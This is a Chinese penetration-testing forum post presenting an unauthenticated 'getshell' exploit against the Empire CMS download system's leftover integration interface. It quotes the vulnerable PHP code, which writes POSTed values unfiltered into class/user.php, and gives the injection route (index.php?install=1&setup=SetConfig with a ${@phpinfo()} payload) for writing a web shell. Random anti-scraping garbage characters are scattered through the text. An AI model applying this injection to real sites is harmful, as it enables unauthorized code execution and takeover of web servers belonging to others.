中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin 时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们
/ V0 J% ?! K+ ?8 F% Y
; Y) y, @% i; O6 B9 s

9 Y, c$ }2 e& e2 w这是帝国的一套下载系统如图
2 S% _9 d$ b/ p8 {8 u6 S* Mps(不需要任何账户和密码，直接写shell)
& X4 C2 e+ v9 ?% Q
由于很多站是由于下载要整合discuz 等等一些论坛....
' M( _/ ~: W0 t: V
; ], m' U) O0 Q% Z- Z
而帝国他又有一个万能接口，如图
" ~' a7 r6 x, \* u$ t/ Y9 K
[attach]170[/attach]9 \3 @: p3 W" s# g  s% ]

' r4 m; i! D+ v9 g& p9 H0 F. i) k# T
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码: _- p9 V$ q" h* R, J5 q7 ^
* `9 u: U" l( I, F% m) k9 q1 u
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪5 n1 r  M9 e. e" F

! x/ X+ Z. H+ y" ~. ]6 v$ s' q! Z: [4 b在data/fun.php中的15行
2 ?6 P4 g2 M- O& [
# l, a- V2 u9 D$ v我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
3 ~) H8 Q0 F5 G+ `$ u6 k& }% O& Y
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干3 E$ h$ e  Y$ M" c$ [& C

, F# o- `1 z6 y# ^这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
) y' k" j* ?: n" i# x7 ?# D$ e" L1 R( R6 d0 u
他将传进来的变量进行了切割，然后赋给了$filetext0 n6 b* X! k1 m& h, j% f9 W0 @8 l
- v9 M6 _2 W* x
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了
7 q; ]) R6 o; E5 ~6 c/ ~
& f/ @+ r$ o* f: \我们看看写入的结果，随便填一个

" q* s" o$ N2 L5 F. p' j  l[attach]171[/attach]
% `, U4 C  M2 K0 f1 n$ }# p7 d! D3 [% y
/ d, Q4 ~- J( M4 ]6 ?# r& Y# t( Z+ O% |
[attach]172[/attach]* n& ^% |% H+ L3 r
5 `8 o) b8 B5 U& c9 m. k0 C
5 F; L9 y* W$ f. S5 F& i

7 B( k) o/ J- o; U/ _9 d0 |" L) L, J: M" ~/ T( M) B

0 y  I: d' c5 g% Z
5 n, W! h4 G6 x( {5 o. C
) k3 \8 I' r9 l+ F4 g# ]5 K4 a8 V" ]
& I# P. i! b( Q7 P6 z% u- T
4 b+ a. e% i3 a; V/ f, n[attach]173[/attach]) m; h9 |$ B) c7 E# N7 Y  _

9 f6 I- M0 h7 {5 q; ^9 s: V) g5 A0 u( G9 @, z

3 t9 \( U. l$ k* k4 _! x! U' w% M4 y) w; l
: d0 C" a- x3 B4 K* R% i+ j
[attach]174[/attach]
% n9 ]* d' u% r. F3 X4 [
0 ]" T* W0 c/ Y0 G' [所以我们淫荡点，写个${@phpinfo()}试试
! a/ p3 U3 l, R: U

然后访问以下class/user.php这个文件, i/ |1 ]+ B* R4 I, z8 y
日了吧

) W, l5 J+ \9 r4 y! T$ _4 h% J- L' Y* ?  @

9 A5 u1 J$ G) l! l) j" o# t4 p( ?# N8 x' ~3 C: k8 {

! X, B, B" o2 w/ B7 B

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)